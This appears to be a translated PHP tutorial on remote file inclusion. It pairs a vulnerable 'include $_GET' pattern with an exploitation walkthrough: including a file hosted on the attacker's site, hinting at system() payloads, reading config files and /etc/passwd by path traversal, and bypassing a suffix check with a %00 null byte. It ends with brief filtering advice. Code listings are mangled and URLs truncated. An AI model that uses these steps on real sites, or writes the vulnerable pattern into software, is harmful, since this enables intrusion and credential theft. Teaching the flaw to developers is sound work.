Home > Article > Backend Development > Discussing the causes of remote file inclusion vulnerabilities in PHP_PHP Tutorial
For beginners
The first question is, what is a "remote file inclusion vulnerability"? The short answer is that the server executes a malicious file through PHP's lax filtering of arbitrary file inclusions. This is a programmer's filtering problem. Please remember that all CGI programs have such bugs.
1. Find the PHP remote file inclusion vulnerability bug:
In order to find the target, we must first know the meaning of two words, in all languages (large Most) have this method of including arbitrary files. In PHP, we use the include() function, its workflow:
If you include include1.PHP in Main.PHP, I will write include("include1.PHP") like this. Not very scientific , but you have to know the reason.
Let’s look at this first. When the user input is passed, the file is included, that is,
<ol class="dp-xml"> <li class="alt"><span><span>if ($_GET <br> ) { </span></span></li> <li><span>include $_GET <br> ; </span></li> <li class="alt"><span>} else { </span></li> <li> <span>include "home.</span>PHP<span>"; </span> </li> <li class="alt"><span>} </span></li> </ol>
This structure is common in dynamic websites. The problem is that it allows this [url]http://www.target.com/explame.PHP?page=main.PHP[/url] or [url]http://www.target.com/explame.PHP?page=downloads.PHP[ /url] to view. In any case, it would be very sad if you have such a bug in your program. You can only be blamed. Although it is just a filtering problem, it is this filtering that has Script hacker. In the survey of zone-h.org, The attack rate contained in the file accounts for 9.4%, which is enough for us to pay attention to, and it is not a problem of a day or two. It existed a few years ago, but today, batches of programmers are still following the old path, so it is With this article, writing such articles in 2004 has become cliché, but I still have to write it. After all, it is not called complaining when it can make people gain.
2. Test
Here is an example of remote file inclusion, with only one purpose. For the safety of your program, let’s look at the specifics
[url]http://www.target.com/explame.PHP?page=zizzy[/url]
Warning: main(zizzy): failed to open stream: No such file or directory in / var/www/htdocs/index.PHP on line 3
Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/PHP') in /var/www/ htdocs/index.PHP on line 3
The error messages output by PHP tell us that the program included the file /var/www/htdocs/zizzy, but it was not found. Did you see it? No such file or directory. Such a file, now you understand that PHP remote files contain vulnerabilities.
3. Using
PHP is really good and you can call files remotely, then I will create a yeah.txt and put it on my website [url]http: //www.mysite.com/yeah.txt.[/url]The content is like this
<ol class="dp-xml"><li class="alt"><span><span class="tag"><</span><span> ? </span></span></li><li><span>echo "Wow,test!"; </span></li><li class="alt"><span class="tag">?></span><span> </span></span></li></ol>
Then [url]http://www.target.com/explame.PHP ?pa...e.com/yeah.txt[/url]
OK, echo Wow, test!, and it is executed. It's not difficult to read config.PHP, it contains the mysql password. Write yeah.txt as PHPinfo; ?> Take a look and try writing it as system(). What do you think? If you go too far, submit page=../../../../.. /../../etc/passwd. Now you know what true inclusion means.
4. The principle of another PHP remote file inclusion vulnerability
Sometimes programmers change the way of writing and write it like this, limiting the scope of inclusion
<ol class="dp-xml"> <li class="alt"><span><span>if ($_GET <br> ) { </span></span></li> <li> <span>include "$_GET <br> .</span>PHP<span>"; </span> </li> <li class="alt"><span>} else { </span></li> <li> <span>include "home.</span>PHP<span>"; </span> </li> <li class="alt"><span>} </span></li> </ol>
We submit [url]http://www.target.com/explame.PHP?pa...e.com/yeah.txt[/url]
Warning : main([url]http://www.mysite.com/yeah.txt.PHP[/url]): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/ explame.PHP on line 3
Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.PHP' for inclusion (include_path='.:/usr/local/ lib/PHP') in /var/www/htdocs/explame.PHP on line 3
Failed to include, restricting the suffix name to PHP, then mysite.com's yeah.txt is changed to yeah.PHP, ok, executed as usual
What about passwd
Warning: main(../../../../../../../etc/passwd.PHP): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3
Warning: main(): Failed opening '../../ ../../../../../etc/passwd.PHP' for inclusion (include_path='.:/usr/local/lib/PHP') in /var/www/htdocs/explame.PHP on line 3
Use a NUL character here, which is %00 to skip detection
[url]http://www.target.com/explame.PHP?pa.. ./etc/passwd%00[/url]
See it.
5. It is recommended that
when including files, it is best to specify which file to include, or to filter the submitted variables. This is what this PHP remote file includes The purpose of vulnerability articles is not to be written for hackers, but for those who are new to programmers. There are many such articles on the Internet. As long as someone benefits, the purpose has been achieved.